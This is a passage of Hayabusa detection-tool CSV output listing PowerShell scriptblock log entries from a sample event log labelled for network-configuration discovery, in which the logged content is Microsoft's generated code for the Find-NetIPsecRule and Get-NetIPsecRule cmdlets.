Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description',",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { 